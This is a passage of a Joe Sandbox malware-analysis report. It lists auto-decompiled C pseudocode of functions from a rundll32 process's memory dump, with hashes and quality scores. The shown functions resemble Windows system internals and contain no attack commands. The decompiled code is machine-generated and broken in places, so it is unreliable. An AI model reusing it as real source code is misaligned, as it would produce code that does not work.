                                                                                            						L10:
                                                                                            						 *(_t58 + 0x34) =  *(_t58 + 0x34) + 1;
                                                                                            						E045EFFB0(_t41, _t51, 0x46c8608);
                                                                                            						_t29 = _t58;
                                                                                            						goto L5;
                                                                                            					}
                                                                                            					_t49 =  *((intOrPtr*)( *[fs:0x30] + 0x10));
                                                                                            					if( *((intOrPtr*)(_t58 + 0x38)) !=  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x294))) {
                                                                                            						goto L11;
                                                                                            					}
                                                                                            					goto L10;
                                                                                            				}
                                                                                            				L1:
                                                                                            				_v13 = 0;
                                                                                            				_t58 = 0;
                                                                                            				goto L2;
                                                                                            			}

                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.952674254.00000000045B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 045B0000, based on PE: true
                                                                                            • Associated: 0000000A.00000002.952842210.00000000046CB000.00000040.00000800.00020000.00000000.sdmp
                                                                                            • Associated: 0000000A.00000002.952873557.00000000046CF000.00000040.00000800.00020000.00000000.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_45b0000_rundll32.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 349f327465df06ec8a3553bb0fc63767674ef7948b5dcc5679b5b176880907d6
                                                                                            • Instruction ID: 0a9bd457b5383314ec474477a87bc9a7cc66fa56c41ea07b63ce4beb4cfa6fa7
                                                                                            • Opcode Fuzzy Hash: 349f327465df06ec8a3553bb0fc63767674ef7948b5dcc5679b5b176880907d6
                                                                                            • Instruction Fuzzy Hash: F83101323012919BC721AF55C944B2AB7A4FBC1B15F09042AE9164B764FF70F801DB8A
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            C-Code - Quality: 93%
                                                                                            			E04618EC7(void* __ecx, void* __edx) {
                                                                                            				signed int _v8;
                                                                                            				intOrPtr _v16;
                                                                                            				intOrPtr _v20;
                                                                                            				intOrPtr _v24;
                                                                                            				char* _v28;
                                                                                            				intOrPtr _v32;
                                                                                            				intOrPtr _v36;
                                                                                            				intOrPtr _v40;
                                                                                            				signed int* _v44;
                                                                                            				intOrPtr _v48;
                                                                                            				intOrPtr _v52;
                                                                                            				intOrPtr _v56;
                                                                                            				signed int* _v60;
                                                                                            				intOrPtr _v64;
                                                                                            				intOrPtr _v68;
                                                                                            				intOrPtr _v72;
                                                                                            				char* _v76;
                                                                                            				intOrPtr _v80;
                                                                                            				signed int _v84;
                                                                                            				intOrPtr _v88;
                                                                                            				intOrPtr _v92;
                                                                                            				intOrPtr _v96;
                                                                                            				intOrPtr _v100;
                                                                                            				intOrPtr _v104;
                                                                                            				signed int* _v108;
                                                                                            				char _v140;
                                                                                            				signed int _v144;
                                                                                            				signed int _v148;
                                                                                            				intOrPtr _v152;
                                                                                            				char _v156;
                                                                                            				intOrPtr _v160;
                                                                                            				char _v164;
                                                                                            				void* __ebx;
                                                                                            				void* __edi;
                                                                                            				void* __esi;
                                                                                            				void* _t67;
                                                                                            				intOrPtr _t70;
                                                                                            				void* _t71;
                                                                                            				void* _t72;
                                                                                            				signed int _t73;
                                                                                            
                                                                                            				_t69 = __edx;
                                                                                            				_v8 =  *0x46cd360 ^ _t73;
                                                                                            				_t48 =  *[fs:0x30];
                                                                                            				_t72 = __edx;
                                                                                            				_t71 = __ecx;
                                                                                            				if( *((intOrPtr*)( *[fs:0x30] + 0x18)) != 0) {
                                                                                            					_t48 = E04604E70(0x46c86e4, 0x4619490, 0, 0);
                                                                                            					if( *0x46c53e8 > 5 && E04618F33(0x46c53e8, 0, 0x2000) != 0) {
                                                                                            						_v156 =  *((intOrPtr*)(_t71 + 0x44));
                                                                                            						_v144 =  *(_t72 + 0x44) & 0x0000ffff;
                                                                                            						_v148 =  *(_t72 + 0x46) & 0x0000ffff;
                                                                                            						_v164 =  *((intOrPtr*)(_t72 + 0x58));
                                                                                            						_v108 =  &_v84;
                                                                                            						_v92 =  *((intOrPtr*)(_t71 + 0x28));
                                                                                            						_v84 =  *(_t71 + 0x24) & 0x0000ffff;
                                                                                            						_v76 =  &_v156;
                                                                                            						_t70 = 8;
                                                                                            						_v60 =  &_v144;
                                                                                            						_t67 = 4;
                                                                                            						_v44 =  &_v148;
                                                                                            						_v152 = 0;
                                                                                            						_v160 = 0;
                                                                                            						_v104 = 0;
                                                                                            						_v100 = 2;
                                                                                            						_v96 = 0;
                                                                                            						_v88 = 0;
                                                                                            						_v80 = 0;
                                                                                            						_v72 = 0;
                                                                                            						_v68 = _t70;
                                                                                            						_v64 = 0;
                                                                                            						_v56 = 0;
                                                                                            						_v52 = 0x46c53e8;
                                                                                            						_v48 = 0;
                                                                                            						_v40 = 0;
                                                                                            						_v36 = 0x46c53e8;
                                                                                            						_v32 = 0;
                                                                                            						_v28 =  &_v164;
                                                                                            						_v24 = 0;
                                                                                            						_v20 = _t70;
                                                                                            						_v16 = 0;
                                                                                            						_t69 = 0x45bbc46;
                                                                                            						_t48 = E04657B9C(0x46c53e8, 0x45bbc46, _t67, 0x46c53e8, _t70,  &_v140);
                                                                                            					}
                                                                                            				}
                                                                                            				return E0461B640(_t48, 0, _v8 ^ _t73, _t69, _t71, _t72);
                                                                                            			}

                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.952674254.00000000045B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 045B0000, based on PE: true
                                                                                            • Associated: 0000000A.00000002.952842210.00000000046CB000.00000040.00000800.00020000.00000000.sdmp
                                                                                            • Associated: 0000000A.00000002.952873557.00000000046CF000.00000040.00000800.00020000.00000000.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_45b0000_rundll32.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 653ca3cb52380d167129406d3995ff0c2a471e8c01b716f8528f3b30aa31e4a5
                                                                                            • Instruction ID: 9473846b9a8c70111a60d85b2a41d0e08c1daf449da5564f1172370e762e02c4
                                                                                            • Opcode Fuzzy Hash: 653ca3cb52380d167129406d3995ff0c2a471e8c01b716f8528f3b30aa31e4a5
                                                                                            • Instruction Fuzzy Hash: 3541A2B1D003189FDB20DFAAD980AADFBF4FB48714F5041AEE549A7240E774AA44CF90
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            C-Code - Quality: 74%
                                                                                            			E0460E730(void* __edx, signed int _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32, intOrPtr _a36, intOrPtr* _a40) {
                                                                                            				intOrPtr* _v0;
                                                                                            				signed char _v4;
                                                                                            				signed int _v8;
                                                                                            				void* __ecx;
                                                                                            				void* __ebp;
                                                                                            				void* _t37;
                                                                                            				intOrPtr _t38;
                                                                                            				signed int _t44;
                                                                                            				signed char _t52;
                                                                                            				void* _t54;
                                                                                            				intOrPtr* _t56;
                                                                                            				void* _t58;
                                                                                            				char* _t59;
                                                                                            				signed int _t62;
                                                                                            
                                                                                            				_t58 = __edx;
                                                                                            				_push(0);
                                                                                            				_push(4);
                                                                                            				_push( &_v8);
                                                                                            				_push(0x24);
                                                                                            				_push(0xffffffff);
                                                                                            				if(E04619670() < 0) {
                                                                                            					L0462DF30(_t54, _t58, _t35);
                                                                                            					asm("int3");
                                                                                            					asm("int3");
                                                                                            					asm("int3");
                                                                                            					asm("int3");
                                                                                            					asm("int3");
                                                                                            					asm("int3");
                                                                                            					_push(_t54);
                                                                                            					_t52 = _v4;
                                                                                            					if(_t52 > 8) {
                                                                                            						_t37 = 0xc0000078;
                                                                                            					} else {
                                                                                            						_t38 =  *0x46c7b9c; // 0x0
                                                                                            						_t62 = _t52 & 0x000000ff;
                                                                                            						_t59 = L045F4620(8 + _t62 * 4,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t38 + 0x140000, 8 + _t62 * 4);
                                                                                            						if(_t59 == 0) {
                                                                                            							_t37 = 0xc0000017;
                                                                                            						} else {
                                                                                            							_t56 = _v0;
                                                                                            							 *(_t59 + 1) = _t52;
                                                                                            							 *_t59 = 1;
                                                                                            							 *((intOrPtr*)(_t59 + 2)) =  *_t56;
                                                                                            							 *((short*)(_t59 + 6)) =  *((intOrPtr*)(_t56 + 4));
                                                                                            							_t44 = _t62 - 1;
                                                                                            							if(_t44 <= 7) {
                                                                                            								switch( *((intOrPtr*)(_t44 * 4 +  &M0460E810))) {
                                                                                            									case 0:
                                                                                            										L6:
                                                                                            										 *((intOrPtr*)(_t59 + 8)) = _a8;
                                                                                            										goto L7;
                                                                                            									case 1:
                                                                                            										L13:
                                                                                            										 *((intOrPtr*)(__edx + 0xc)) = _a12;
                                                                                            										goto L6;
                                                                                            									case 2:
                                                                                            										L12:
                                                                                            										 *((intOrPtr*)(__edx + 0x10)) = _a16;
                                                                                            										goto L13;
                                                                                            									case 3:
                                                                                            										L11:
                                                                                            										 *((intOrPtr*)(__edx + 0x14)) = _a20;
                                                                                            										goto L12;
                                                                                            									case 4:
                                                                                            										L10:
                                                                                            										 *((intOrPtr*)(__edx + 0x18)) = _a24;
                                                                                            										goto L11;
                                                                                            									case 5:
                                                                                            										L9:
                                                                                            										 *((intOrPtr*)(__edx + 0x1c)) = _a28;
                                                                                            										goto L10;
                                                                                            									case 6:
                                                                                            										L17:
                                                                                            										 *((intOrPtr*)(__edx + 0x20)) = _a32;
                                                                                            										goto L9;
                                                                                            									case 7:
                                                                                            										 *((intOrPtr*)(__edx + 0x24)) = _a36;
                                                                                            										goto L17;
                                                                                            								}
                                                                                            							}
                                                                                            							L7:
                                                                                            							 *_a40 = _t59;
                                                                                            							_t37 = 0;
                                                                                            						}
                                                                                            					}
                                                                                            					return _t37;
                                                                                            				} else {
                                                                                            					_push(0x20);
                                                                                            					asm("ror eax, cl");
                                                                                            					return _a4 ^ _v8;
                                                                                            				}
                                                                                            			}


















                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.952674254.00000000045B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 045B0000, based on PE: true
                                                                                            • Associated: 0000000A.00000002.952842210.00000000046CB000.00000040.00000800.00020000.00000000.sdmp
                                                                                            • Associated: 0000000A.00000002.952873557.00000000046CF000.00000040.00000800.00020000.00000000.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_45b0000_rundll32.jbxd
                                                                                            Similarity
                                                                                            • Opcode ID: 00e4d0c5e87caca48cee9b4a900aaa4a5fd6b31d047dd1b173a54588f059988b
                                                                                            • Instruction ID: e77dbacb57b95bbac061ad37903d88d291a59e43f2d70c4d196cde78c2563464
                                                                                            • Opcode Fuzzy Hash: 00e4d0c5e87caca48cee9b4a900aaa4a5fd6b31d047dd1b173a54588f059988b
                                                                                            • Instruction Fuzzy Hash: 0C318D75A14249EFE744CF58C840B9AB7E8FB19314F14866AF904CB381E672FD80CBA1
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            C-Code - Quality: 67%
                                                                                            			E0460BC2C(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, signed int _a8) {
                                                                                            				intOrPtr _v8;
                                                                                            				intOrPtr _v12;
                                                                                            				void* __ebx;
                                                                                            				void* __edi;
                                                                                            				intOrPtr _t22;
                                                                                            				intOrPtr* _t41;
                                                                                            				intOrPtr _t51;
                                                                                            
                                                                                            				_t51 =  *0x46c6100; // 0x48
                                                                                            				_v12 = __edx;
                                                                                            				_v8 = __ecx;
                                                                                            				if(_t51 >= 0x800) {
                                                                                            					L12:
                                                                                            					return 0;
                                                                                            				} else {
                                                                                            					goto L1;
                                                                                            				}
                                                                                            				while(1) {
                                                                                            					L1:
                                                                                            					_t22 = _t51;
                                                                                            					asm("lock cmpxchg [ecx], edx");
                                                                                            					if(_t51 == _t22) {
                                                                                            						break;
                                                                                            					}
                                                                                            					_t51 = _t22;
                                                                                            					if(_t22 < 0x800) {
                                                                                            						continue;
                                                                                            					}
                                                                                            					goto L12;
                                                                                            				}
                                                                                            				E045F2280(0xd, 0x161df1a0);
                                                                                            				_t41 =  *0x46c60f8; // 0x0
                                                                                            				if(_t41 != 0) {
                                                                                            					 *0x46c60f8 =  *_t41;
                                                                                            					 *0x46c60fc =  *0x46c60fc + 0xffff;
                                                                                            				}
                                                                                            				E045EFFB0(_t41, 0x800, 0x161df1a0);
                                                                                            				if(_t41 != 0) {
                                                                                            					L6:
                                                                                            					asm("movsd");
                                                                                            					asm("movsd");
                                                                                            					asm("movsd");
                                                                                            					asm("movsd");
                                                                                            					 *((intOrPtr*)(_t41 + 0x1c)) = _v12;
                                                                                            					 *((intOrPtr*)(_t41 + 0x20)) = _a4;
                                                                                            					 *(_t41 + 0x36) =  *(_t41 + 0x36) & 0x00008000 | _a8 & 0x00003fff;
                                                                                            					do {
                                                                                            						asm("lock xadd [0x46c60f0], ax");
                                                                                            						 *((short*)(_t41 + 0x34)) = 1;
                                                                                            					} while (1 == 0);
                                                                                            					goto L8;
                                                                                            				} else {
                                                                                            					_t41 = L045F4620(0x46c6100,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0xd0);
                                                                                            					if(_t41 == 0) {
                                                                                            						L11:
                                                                                            						asm("lock dec dword [0x46c6100]");
                                                                                            						L8:
                                                                                            						return _t41;
                                                                                            					}
                                                                                            					 *(_t41 + 0x24) =  *(_t41 + 0x24) & 0x00000000;
                                                                                            					 *(_t41 + 0x28) =  *(_t41 + 0x28) & 0x00000000;
                                                                                            					if(_t41 == 0) {
                                                                                            						goto L11;
                                                                                            					}
                                                                                            					goto L6;
                                                                                            				}
                                                                                            			}











                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.952674254.00000000045B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 045B0000, based on PE: true
                                                                                            • Associated: 0000000A.00000002.952842210.00000000046CB000.00000040.00000800.00020000.00000000.sdmp
                                                                                            • Associated: 0000000A.00000002.952873557.00000000046CF000.00000040.00000800.00020000.00000000.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_45b0000_rundll32.jbxd
                                                                                            Similarity
                                                                                            • Opcode ID: 7a0cae32536436751fa6ff518c0e17355d3de22a426b6aca54026158fb1cca22
                                                                                            • Instruction ID: bf7c37059b89350c20f381bfa51dab419f309ffb4ae5fe2cadb45651978e2ec6
                                                                                            • Opcode Fuzzy Hash: 7a0cae32536436751fa6ff518c0e17355d3de22a426b6aca54026158fb1cca22
                                                                                            • Instruction Fuzzy Hash: 9F31FF726006069FDB11DF98D4807BBB3A4FB68711F04807AE914EB381FA78FD058B88
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            C-Code - Quality: 76%
                                                                                            			E045D9100(signed int __ebx, void* __ecx, void* __edi, signed int __esi, void* __eflags) {
                                                                                            				signed int _t53;
                                                                                            				signed int _t56;
                                                                                            				signed int* _t60;
                                                                                            				signed int _t63;
                                                                                            				signed int _t66;
                                                                                            				signed int _t69;
                                                                                            				void* _t70;
                                                                                            				intOrPtr* _t72;
                                                                                            				void* _t78;
                                                                                            				void* _t79;
                                                                                            				signed int _t80;
                                                                                            				intOrPtr _t82;
                                                                                            				void* _t85;
                                                                                            				void* _t88;
                                                                                            				void* _t89;
                                                                                            
                                                                                            				_t84 = __esi;
                                                                                            				_t70 = __ecx;
                                                                                            				_t68 = __ebx;
                                                                                            				_push(0x2c);
                                                                                            				_push(0x46af6e8);
                                                                                            				E0462D0E8(__ebx, __edi, __esi);
                                                                                            				 *((char*)(_t85 - 0x1d)) = 0;
                                                                                            				_t82 =  *((intOrPtr*)(_t85 + 8));
                                                                                            				if(_t82 == 0) {
                                                                                            					L4:
                                                                                            					if( *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) == 0) {
                                                                                            						E046A88F5(_t68, _t70, _t78, _t82, _t84, __eflags);
                                                                                            					}
                                                                                            					L5:
                                                                                            					return E0462D130(_t68, _t82, _t84);
                                                                                            				}
                                                                                            				_t88 = _t82 -  *0x46c86c0; // 0x29e07b0
                                                                                            				if(_t88 == 0) {
                                                                                            					goto L4;
                                                                                            				}
                                                                                            				_t89 = _t82 -  *0x46c86b8; // 0x0
                                                                                            				if(_t89 == 0 ||  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) != 0) {
                                                                                            					goto L4;
                                                                                            				} else {
                                                                                            					E045F2280(_t82 + 0xe0, _t82 + 0xe0);
                                                                                            					 *(_t85 - 4) =  *(_t85 - 4) & 0x00000000;
                                                                                            					__eflags =  *((char*)(_t82 + 0xe5));
                                                                                            					if(__eflags != 0) {
                                                                                            						E046A88F5(__ebx, _t70, _t78, _t82, __esi, __eflags);
                                                                                            						goto L12;
                                                                                            					} else {
                                                                                            						__eflags =  *((char*)(_t82 + 0xe4));
                                                                                            						if( *((char*)(_t82 + 0xe4)) == 0) {
                                                                                            							 *((char*)(_t82 + 0xe4)) = 1;
                                                                                            							_push(_t82);
                                                                                            							_push( *((intOrPtr*)(_t82 + 0x24)));
                                                                                            							E0461AFD0();
                                                                                            						}
                                                                                            						while(1) {
                                                                                            							_t60 = _t82 + 8;
                                                                                            							 *(_t85 - 0x2c) = _t60;
                                                                                            							_t68 =  *_t60;
                                                                                            							_t80 = _t60[1];
                                                                                            							 *(_t85 - 0x28) = _t68;
                                                                                            							 *(_t85 - 0x24) = _t80;
                                                                                            							while(1) {
                                                                                            								L10:
                                                                                            								__eflags = _t80;
                                                                                            								if(_t80 == 0) {
                                                                                            									break;
                                                                                            								}
                                                                                            								_t84 = _t68;
                                                                                            								 *(_t85 - 0x30) = _t80;
                                                                                            								 *(_t85 - 0x24) = _t80 - 1;
                                                                                            								asm("lock cmpxchg8b [edi]");
                                                                                            								_t68 = _t84;
                                                                                            								 *(_t85 - 0x28) = _t68;
                                                                                            								 *(_t85 - 0x24) = _t80;
                                                                                            								__eflags = _t68 - _t84;
                                                                                            								_t82 =  *((intOrPtr*)(_t85 + 8));
                                                                                            								if(_t68 != _t84) {
                                                                                            									continue;
                                                                                            								}
                                                                                            								__eflags = _t80 -  *(_t85 - 0x30);
                                                                                            								if(_t80 !=  *(_t85 - 0x30)) {
                                                                                            									continue;
                                                                                            								}
                                                                                            								__eflags = _t80;
                                                                                            								if(_t80 == 0) {
                                                                                            									break;
                                                                                            								}
                                                                                            								_t63 = 0;
                                                                                            								 *(_t85 - 0x34) = 0;
                                                                                            								_t84 = 0;
                                                                                            								__eflags = 0;
                                                                                            								while(1) {
                                                                                            									 *(_t85 - 0x3c) = _t84;
                                                                                            									__eflags = _t84 - 3;
                                                                                            									if(_t84 >= 3) {
                                                                                            										break;
                                                                                            									}
                                                                                            									__eflags = _t63;
                                                                                            									if(_t63 != 0) {
                                                                                            										L40:
                                                                                            										_t84 =  *_t63;
                                                                                            										__eflags = _t84;
                                                                                            										if(_t84 != 0) {
                                                                                            											_t84 =  *(_t84 + 4);
                                                                                            											__eflags = _t84;
                                                                                            											if(_t84 != 0) {
                                                                                            												 *0x46cb1e0(_t63, _t82);
                                                                                            												 *_t84();
                                                                                            											}
                                                                                            										}
                                                                                            										do {
                                                                                            											_t60 = _t82 + 8;
                                                                                            											 *(_t85 - 0x2c) = _t60;
                                                                                            											_t68 =  *_t60;
                                                                                            											_t80 = _t60[1];
                                                                                            											 *(_t85 - 0x28) = _t68;
                                                                                            											 *(_t85 - 0x24) = _t80;
                                                                                            											goto L10;
                                                                                            										} while (_t63 == 0);
                                                                                            										goto L40;
                                                                                            									}
                                                                                            									_t69 = 0;
                                                                                            									__eflags = 0;
                                                                                            									while(1) {
                                                                                            										 *(_t85 - 0x38) = _t69;
                                                                                            										__eflags = _t69 -  *0x46c84c0;
                                                                                            										if(_t69 >=  *0x46c84c0) {
                                                                                            											break;
                                                                                            										}
                                                                                            										__eflags = _t63;
                                                                                            										if(_t63 != 0) {
                                                                                            											break;
                                                                                            										}
                                                                                            										_t66 = E046A9063(_t69 * 0xc +  *((intOrPtr*)(_t82 + 0x10 + _t84 * 4)), _t80, _t82);
                                                                                            										__eflags = _t66;
                                                                                            										if(_t66 == 0) {
                                                                                            											_t63 = 0;
                                                                                            											__eflags = 0;
                                                                                            										} else {
                                                                                            											_t63 = _t66 + 0xfffffff4;
                                                                                            										}
                                                                                            										 *(_t85 - 0x34) = _t63;
                                                                                            										_t69 = _t69 + 1;
                                                                                            									}
                                                                                            									_t84 = _t84 + 1;
                                                                                            								}
                                                                                            								__eflags = _t63;
                                                                                            							}
                                                                                            							 *((intOrPtr*)(_t82 + 0xf4)) =  *((intOrPtr*)(_t85 + 4));
                                                                                            							 *((char*)(_t82 + 0xe5)) = 1;
                                                                                            							 *((char*)(_t85 - 0x1d)) = 1;
                                                                                            							L12:
                                                                                            							 *(_t85 - 4) = 0xfffffffe;
                                                                                            							E045D922A(_t82);
                                                                                            							_t53 = E045F7D50();
                                                                                            							__eflags = _t53;
                                                                                            							if(_t53 != 0) {
                                                                                            								_t56 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
                                                                                            							} else {
                                                                                            								_t56 = 0x7ffe0386;
                                                                                            							}
                                                                                            							__eflags =  *_t56;
                                                                                            							if( *_t56 != 0) {
                                                                                            								_t56 = E046A8B58(_t82);
                                                                                            							}
                                                                                            							__eflags =  *((char*)(_t85 - 0x1d));
                                                                                            							if( *((char*)(_t85 - 0x1d)) != 0) {
                                                                                            								__eflags = _t82 -  *0x46c86c0; // 0x29e07b0
                                                                                            								if(__eflags != 0) {
                                                                                            									__eflags = _t82 -  *0x46c86b8; // 0x0
                                                                                            									if(__eflags == 0) {
                                                                                            										_t79 = 0x46c86bc;
                                                                                            										_t72 = 0x46c86b8;
                                                                                            										goto L18;
                                                                                            									}
                                                                                            									__eflags = _t56 | 0xffffffff;
                                                                                            									asm("lock xadd [edi], eax");
                                                                                            									if(__eflags == 0) {
                                                                                            										E045D9240(_t68, _t82, _t82, _t84, __eflags);
                                                                                            									}
                                                                                            								} else {
                                                                                            									_t79 = 0x46c86c4;
                                                                                            									_t72 = 0x46c86c0;
                                                                                            									L18:
                                                                                            									E04609B82(_t68, _t72, _t79, _t82, _t84, __eflags);
                                                                                            								}
                                                                                            							}
                                                                                            							goto L5;
                                                                                            						}
                                                                                            					}
                                                                                            				}
                                                                                            			}


















                                                                                            0x0463376a
                                                                                            0x0463376a
                                                                                            0x0463376c
                                                                                            0x0463376c
                                                                                            0x0463376f
                                                                                            0x04633775
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x04633777
                                                                                            0x04633779
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x04633782
                                                                                            0x04633787
                                                                                            0x04633789
                                                                                            0x04633790
                                                                                            0x04633790
                                                                                            0x0463378b
                                                                                            0x0463378b
                                                                                            0x0463378b
                                                                                            0x04633792
                                                                                            0x04633795
                                                                                            0x04633795
                                                                                            0x04633798
                                                                                            0x04633798
                                                                                            0x0463379b
                                                                                            0x0463379b
                                                                                            0x045d91a3
                                                                                            0x045d91a9
                                                                                            0x045d91b0
                                                                                            0x045d91b4
                                                                                            0x045d91b4
                                                                                            0x045d91bb
                                                                                            0x045d91c0
                                                                                            0x045d91c5
                                                                                            0x045d91c7
                                                                                            0x046337da
                                                                                            0x045d91cd
                                                                                            0x045d91cd
                                                                                            0x045d91cd
                                                                                            0x045d91d2
                                                                                            0x045d91d5
                                                                                            0x045d9239
                                                                                            0x045d9239
                                                                                            0x045d91d7
                                                                                            0x045d91db
                                                                                            0x045d91e1
                                                                                            0x045d91e7
                                                                                            0x045d91fd
                                                                                            0x045d9203
                                                                                            0x045d921e
                                                                                            0x045d9223
                                                                                            0x00000000
                                                                                            0x045d9223
                                                                                            0x045d9205
                                                                                            0x045d9208
                                                                                            0x045d920c
                                                                                            0x045d9214
                                                                                            0x045d9214
                                                                                            0x045d91e9
                                                                                            0x045d91e9
                                                                                            0x045d91ee
                                                                                            0x045d91f3
                                                                                            0x045d91f3
                                                                                            0x045d91f3
                                                                                            0x045d91e7
                                                                                            0x00000000
                                                                                            0x045d91db
                                                                                            0x045d9187
                                                                                            0x045d9168

                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.952674254.00000000045B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 045B0000, based on PE: true
                                                                                            • Associated: 0000000A.00000002.952842210.00000000046CB000.00000040.00000800.00020000.00000000.sdmp
                                                                                            • Associated: 0000000A.00000002.952873557.00000000046CF000.00000040.00000800.00020000.00000000.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_45b0000_rundll32.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: c815fe22c5b216c3c6b3ebd1297c4d6f13968f3608e1dbd0d6c87b8db75fc697
                                                                                            • Instruction ID: 8cf8a99df5fe2e833df78435bc8313ed2a9364b7b8655fb9d5140dd261b834fe
                                                                                            • Opcode Fuzzy Hash: c815fe22c5b216c3c6b3ebd1297c4d6f13968f3608e1dbd0d6c87b8db75fc697
                                                                                            • Instruction Fuzzy Hash: A131A0B1A01685DFEB35EFACD4887ADB7B1BF88314F188549D40467341E334B980EB56
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            C-Code - Quality: 60%
                                                                                            			E04601DB5(intOrPtr __ecx, intOrPtr* __edx, intOrPtr* _a4) {
                                                                                            				char _v8;
                                                                                            				intOrPtr _v12;
                                                                                            				intOrPtr _v16;
                                                                                            				intOrPtr* _v20;
                                                                                            				void* _t22;
                                                                                            				char _t23;
                                                                                            				void* _t36;
                                                                                            				intOrPtr _t42;
                                                                                            				intOrPtr _t43;
                                                                                            
                                                                                            				_v12 = __ecx;
                                                                                            				_t43 = 0;
                                                                                            				_v20 = __edx;
                                                                                            				_t42 =  *__edx;
                                                                                            				 *__edx = 0;
                                                                                            				_v16 = _t42;
                                                                                            				_push( &_v8);
                                                                                            				_push(0);
                                                                                            				_push(0);
                                                                                            				_push(6);
                                                                                            				_push(0);
                                                                                            				_push(__ecx);
                                                                                            				_t36 = ((0 | __ecx !=  *((intOrPtr*)( *[fs:0x30] + 8))) - 0x00000001 & 0xc0000000) + 0x40000002;
                                                                                            				_push(_t36);
                                                                                            				_t22 = E045FF460();
                                                                                            				if(_t22 < 0) {
                                                                                            					if(_t22 == 0xc0000023) {
                                                                                            						goto L1;
                                                                                            					}
                                                                                            					L3:
                                                                                            					return _t43;
                                                                                            				}
                                                                                            				L1:
                                                                                            				_t23 = _v8;
                                                                                            				if(_t23 != 0) {
                                                                                            					_t38 = _a4;
                                                                                            					if(_t23 >  *_a4) {
                                                                                            						_t42 = L045F4620(_t38,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t23);
                                                                                            						if(_t42 == 0) {
                                                                                            							goto L3;
                                                                                            						}
                                                                                            						_t23 = _v8;
                                                                                            					}
                                                                                            					_push( &_v8);
                                                                                            					_push(_t23);
                                                                                            					_push(_t42);
                                                                                            					_push(6);
                                                                                            					_push(_t43);
                                                                                            					_push(_v12);
                                                                                            					_push(_t36);
                                                                                            					if(E045FF460() < 0) {
                                                                                            						if(_t42 != 0 && _t42 != _v16) {
                                                                                            							L045F77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t43, _t42);
                                                                                            						}
                                                                                            						goto L3;
                                                                                            					}
                                                                                            					 *_v20 = _t42;
                                                                                            					 *_a4 = _v8;
                                                                                            				}
                                                                                            				_t43 = 1;
                                                                                            				goto L3;
                                                                                            			}













                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.952674254.00000000045B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 045B0000, based on PE: true
                                                                                            • Associated: 0000000A.00000002.952842210.00000000046CB000.00000040.00000800.00020000.00000000.sdmp
                                                                                            • Associated: 0000000A.00000002.952873557.00000000046CF000.00000040.00000800.00020000.00000000.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_45b0000_rundll32.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 113d149f2ee32d0cf172cc5618c6b00e5ec00d0f660e83749918783638c296a2
                                                                                            • Instruction ID: e78af5c453955b593c314ec8ce4ee4ae1c622d930cdda3f4adfe7825950eb1af
                                                                                            • Opcode Fuzzy Hash: 113d149f2ee32d0cf172cc5618c6b00e5ec00d0f660e83749918783638c296a2
                                                                                            • Instruction Fuzzy Hash: 83216072600219AFD725CF59CC80EAFBBB9EF86744F118065E90597250EA35BE41D790
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            C-Code - Quality: 53%
                                                                                            			E045F0050(void* __ecx) {
                                                                                            				signed int _v8;
                                                                                            				void* __ebx;
                                                                                            				void* __edi;
                                                                                            				void* __esi;
                                                                                            				void* __ebp;
                                                                                            				intOrPtr* _t30;
                                                                                            				intOrPtr* _t31;
                                                                                            				signed int _t34;
                                                                                            				void* _t40;
                                                                                            				void* _t41;
                                                                                            				signed int _t44;
                                                                                            				intOrPtr _t47;
                                                                                            				signed int _t58;
                                                                                            				void* _t59;
                                                                                            				void* _t61;
                                                                                            				void* _t62;
                                                                                            				signed int _t64;
                                                                                            
                                                                                            				_push(__ecx);
                                                                                            				_v8 =  *0x46cd360 ^ _t64;
                                                                                            				_t61 = __ecx;
